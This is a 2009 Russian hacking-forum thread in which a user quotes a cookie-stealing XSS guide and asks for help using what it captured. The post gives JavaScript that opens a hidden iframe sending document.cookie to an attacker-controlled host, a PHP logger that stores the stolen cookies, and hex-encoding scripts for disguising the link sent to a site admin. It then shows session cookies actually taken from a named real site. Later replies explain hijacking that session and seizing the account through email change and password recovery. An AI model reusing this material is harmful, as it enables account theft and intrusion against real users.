Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

18.01.2009, 16:20
|
|
Новичок
Регистрация: 13.11.2008
Сообщений: 27
Провел на форуме: 46190
Репутация:
3
|
|
Помогите разобраться!!!
Привет онлайновые духи), на одном из форумов посвященных хеку нашел такой способ кражи куков:
Автор: Jenizix
Ну найти в интернете описание XSS-бага я думаю труда не составит... Перейдем сразу к использованию:
-= 3-2-1 go! =-
Сначала зарегистрируем ( или возьмем имеющийся ) домен с хостингом ( пофиг какого уровня =)))) ) с поддержкой PHP... допустим мы зарегили xss.host.ru... Создадим файл xss.js с таким содержимым:
CODE document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');
Этот JavаScript будет открывать невидимый iframe на странице, в котором будет гризиться наш скрипт принимающий куки... + ему будет передаваться имя сайта откуда куки были стырены.
Я выбрал тег <iframe> т.к. у некоторых отключен показ рисунков => тег <img> не прокатит... да и попапы могут резаться...
Теперь создадим файл xss.php:CODE <? $file = fopen("cookies","a"); fputs($file,"[".date("d.m.y H:i")."]".$QUERY_STRING."\r\n"); fclose($file); ?>
Этот скрипт будет записывать дату и полученое "печенье" в файл cookies Закинем оба файла в веб-директорию нашего сайта... ну вощем чтоб они были доступны как http://xss.host.ru/xss.js и http://xss.host.ru/xss.php
-= Боевые действия =-
Ну теперь найдем бажный сайт с XSS уязвимостью. Допустим уязвимость будет тут: http://site.ru/find.php?find=[xss] ок. уязвимость есть. пошлем скрипту find.php запрос типа find.php?find=<script src=http://xss.host.ru/xss.js></script> и затем открываем http://xss.host.ru/cookies и видим стырены куки! =)))
-= Шифруемся =-
НО! В открытую этот линк кидать не стоит... палевно... сделаем так, напишем php-скрипт для кодировки символов в hex и для разкодировки из hex: hex.php:
CODE <? $str = urldecode($_SERVER['QUERY_STRING']); for($i=0;$i<strlen($str);$i++) { $hex=dechex(ord($str[$i])); if($str[$i]=='&') echo "$str[$i]"; else echo "%$hex"; } ?> ну и unhex.php:CODE <? echo urldecode($_SERVER['QUERY_STRING']); ?> например нам нужно чтобы юзер прошелся по этой ссылке: http://site.ru/find.php?find=<script src=http://xss.host.ru/xss.js></script> но как я уже говорил, в открытую ее ему кидать - палевно... заюзаем наш hex.php: http://xss.host.ru/hex.php?<script src=http://xss.host.ru/xss.js></script>
Получим вот что: %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%78%73%73%2e %68%6f%73%74%2e%72%75%2f%78%73%73%2e%6a%73%3e%3c%2 f%73%63%72%69%70%74 %3e
это hex представление текста: <script src=http://xss.host.ru/xss.js></script> Теперь наша ссылка будет выглядеть вот так:
QUOTE http://site.ru/find.php?find=%3c%73%63%72%69%70%74%20%73%72%63%3d %68%74%74%70%3a%2f%2f%78%73%73%2e %68%6f%73%74%2e%72%75%2f%78%73%73%2e%6a%73%3e%3c%2 f%73%63%72%69%70%74 %3e
Как видите, не очень и палиться =))) Теперь осталось скинуть этот линк какомунибудь юзеру ( а лучше админу ) сайта site.ru и ждать его куков ( если конечно они там юзаются )... Куки могут быть в hex-виде... тут нам придет на помощ unhex.php: http://xss.host.ru/unhex.php?[тут_куки]
-= Подводим итоги =-
Теперь у нас есть полноценные скрипты для проведения XSS-атаки. Еще можно наш xss.js прогнать через hex.php чтоб еще побольше обезопаситься )))
Так вот нашел бажный сайт, проделавши все вышесказанное, в фаиле cookies приходят только вот такие пиченки 18.01.09 09:34][www.bgsha.com]:BG..._COM_LOGIN=red-white;%20PHPSESSID=e0f723cb0615e9dc96432a0edae123f 1;%20BGSHA_COM_GUEST_ID=158115;%20BGSHA_COM_LAST_V ISIT=18.01.2009+12%3A30%3A52 ВОТ ВОПРОС: Как мы видим логин юзверя пришел но где хеш с пасом? Может тут код какой подправить нужо или может что я не так сделал? Помогите разобратьсь!!! 
|
|
|

18.01.2009, 16:31
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
На очень многих форумах в куки пишется только сессия. Она тебе и прилетела
PHPSESSID=e0f723cb0615e9dc96432a0edae123f
И логин прилетел. Тебе просто надо поставить все это себе в куки, f5 - и ты станешь red-white по идее. Потом, допустим, из формы "Забыл пароль, выслать на почту", предварительно сменив почту в профайле на свою, выслать себе пароль (при условии - проверить!!! - что пароль не генерица новый, а просто высылается старый). При соблюдении этих условий, если ты получил пароль, поменяй почту обратно на старую. При любых других вариантах просто сможешь лазить по форуму под этим ником, пока сессия не кончится
|
|
|

18.01.2009, 16:45
|
|
Новичок
Регистрация: 13.11.2008
Сообщений: 27
Провел на форуме: 46190
Репутация:
3
|
|
Сообщение от Pashkela
На очень многих форумах в куки пишется только сессия. Она тебе и прилетела
PHPSESSID=e0f723cb0615e9dc96432a0edae123f
Тебе просто надо поставить все это себе в куки, f5 - и ты станешь red-white по идее. Потом, допустим, из формы "Забыл пароль, выслать на почту", предварительно сменив почту в профайле на свою, выслать себе пароль (при условии - проверить!!! - что пароль не генерица новый, а просто высылается старый). При соблюдении этих условий, если ты получил пароль, поменяй почту обратно на старую. При любых других вариантах просто сможешь лазить по форуму под этим ником, пока сессия не кончится
Можно поточнее, эту сесию мне вставить вместо своей к примеру, и перезагрузить страниуцу, я так понял??? Остальное вроде ясно...
|
|
|

18.01.2009, 17:21
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Да, всё так, не просто сессию, а все куки, что прилетели, заменить, т.е. имя, время и т.д. Читай "XSS для новичков"
https://forum.antichat.ru/thread20140.html
|
|
|

18.01.2009, 17:45
|
|
Новичок
Регистрация: 13.11.2008
Сообщений: 27
Провел на форуме: 46190
Репутация:
3
|
|
Поробовал подставить, пишет: You don't have permission to access /; PHPSESSID=e0f723cb0615e9dc96432a0edae123f1; BG...._COM_GUEST_ID=158115; BGSHA_COM_LAST_VISIT=18.01.2009+12:31:54 on this server
доступ запрещен типа к этой сессии, опесни пож как ты ил виду "подставить сесию" раскажи подробнее.. пож
|
|
|

18.01.2009, 18:10
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме: 3152874
Репутация:
1020
|
|
по всей видимости там идет привязка сесси к ip
|
|
|

18.01.2009, 19:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сессии имеют время жизни в том числе. Т.е. смысл в том, чтобы сработало, в большинстве случаев надо действовать быстро. Сессии могут обновляться раз в полчаса
|
|
|

18.01.2009, 20:27
|
|
Новичок
Регистрация: 13.11.2008
Сообщений: 27
Провел на форуме: 46190
Репутация:
3
|
|
Так можно, что нить сделать с этими сессиями или это бесполезно?
|
|
|

18.01.2009, 23:55
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
https://forum.antichat.ru/thread20140.html
всё, вопрос закрыт. Читай ссылку. Всё и так разжевали
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|